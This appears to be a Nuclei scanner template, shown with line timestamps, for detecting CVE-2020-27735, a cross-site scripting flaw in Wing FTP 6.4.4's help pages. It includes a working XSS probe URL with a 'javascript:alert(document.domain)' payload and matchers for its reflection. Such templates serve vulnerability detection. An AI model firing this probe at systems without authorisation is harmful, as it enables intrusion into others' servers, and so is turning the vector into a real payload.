2021-07-27 03:23:23 +00:00
id : CVE-2020-27735
info :
2022-08-16 14:14:41 +00:00
name : Wing FTP 6.4.4 - Cross-Site Scripting
2021-07-27 03:23:23 +00:00
author : pikpikcu
severity : medium
description : |
2022-08-16 14:14:41 +00:00
Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
2022-04-22 10:38:41 +00:00
reference :
2022-05-17 09:18:12 +00:00
- https://www.wftpserver.com/serverhistory.htm
- https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html
2022-08-16 14:14:41 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-27735
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-27735
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:*
epss-score : 0.00179
2022-04-22 10:38:41 +00:00
tags : cve,cve2020,xss,wing-ftp
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2021-07-27 03:23:23 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-07-27 03:23:23 +00:00
- method : GET
path :
2022-08-16 14:14:41 +00:00
- "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
2021-07-27 03:23:23 +00:00
matchers-condition : and
matchers :
- type : word
words :
2021-07-27 11:02:50 +00:00
- '<frame name="hmcontent" src="javascript:alert(document.domain)" title="Content frame">'
2021-07-27 03:23:23 +00:00
part : body
- type : status
status :
- 200
2021-07-27 05:11:08 +00:00
- type : word
part : header
words :
- text/html
2022-08-16 14:14:41 +00:00
# Enhanced by mp on 2022/08/14